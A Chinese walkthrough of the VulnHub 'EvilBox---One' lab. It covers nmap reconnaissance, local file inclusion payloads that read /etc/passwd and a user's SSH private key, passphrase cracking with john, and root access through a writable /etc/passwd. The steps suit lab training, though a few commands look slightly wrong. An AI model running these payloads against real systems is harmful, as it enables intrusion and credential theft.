靶场下载地址:
https://download.vulnhub.com/evilbox/EvilBox---One.ova
信息搜集
一、Nmap进行扫描
nmap -sP 192.168.128.0/24 #对自己的靶机网段进行存活探测,获取靶机地址
nmap -T4 -A -p- 192.168.128.128 #对目标进行全端口扫描
二、WEB服务探测
通过探测发现目标开启了22、80端口
使用dirsearch进行目录扫描,发现robots.txt文件和/secret/目录
在/secret目录下发现了evil.php文件
通过fuzz到command存在文件包含
http://192.168.128.128/secret/evil.php?command=../index.html
三、获取shell
可以读取到/etc/passwd
http://192.168.128.128/secret/evil.php?command=../../../../../../../etc/passwd
通过查看passwd文件发现mowree用户
ssh mowree@192.168.128.128 -v
可以使用的身份验证:公钥、密码
尝试通过文件包含查看mowree公钥文件、私钥文件
尝试通过文件包含查看mowree公钥文件、私钥文件
http://192.168.128.128/secret/evil.php?command=../../../../../home/mowree/.ssh/authorized_keys
http://192.168.128.128/secret/evil.php?command=../../../../../home/mowree/.ssh/id_rsa
将mowree私钥文件保存到Kali
wget -O id_rsa http://192.168.128.128/secret/evil.php?command=../../../../../home/mowree/.ssh/id_rsa
chmod 777 id_rsa # 修改id_rsa 文件权限
ssh mowree@192.168.128.128 -i id_rsa # 使用私钥连接
连接发现需要输入加密私钥的密码
# 使用字典进行爆破加密密码
# 准备密码
cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
#id_rsa文件格式转换
/usr/share/john/ssh2john.py id_rsa > hash
#使用john爆破
john hash --wordlist=rockyou.txt
破解出加密id_rsa的加密密码为unicorn
再次使用id_rsa私钥登录
ssh mowree@192.168.128.128 -i id_rsa
成功登录获取到mowree权限
四、权限提升
# 查找具有写入权限的文件
find / writable 2>/dev/null | grep -v proc
通过查找发现/etc/passwd文件具有写入权限
openssl passwd -1 # 生成一个密码 123456
$1$jDebtByd$LilZiamAWeJykmDBDItt.1 # 生成后的密文
vi /etc/passwd #将密文写入/etc/passwd root用户密码处
su root
123456
成功获取root权限
原文始发于微信公众号(渗透笔记):EvilBox---One靶场实战
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论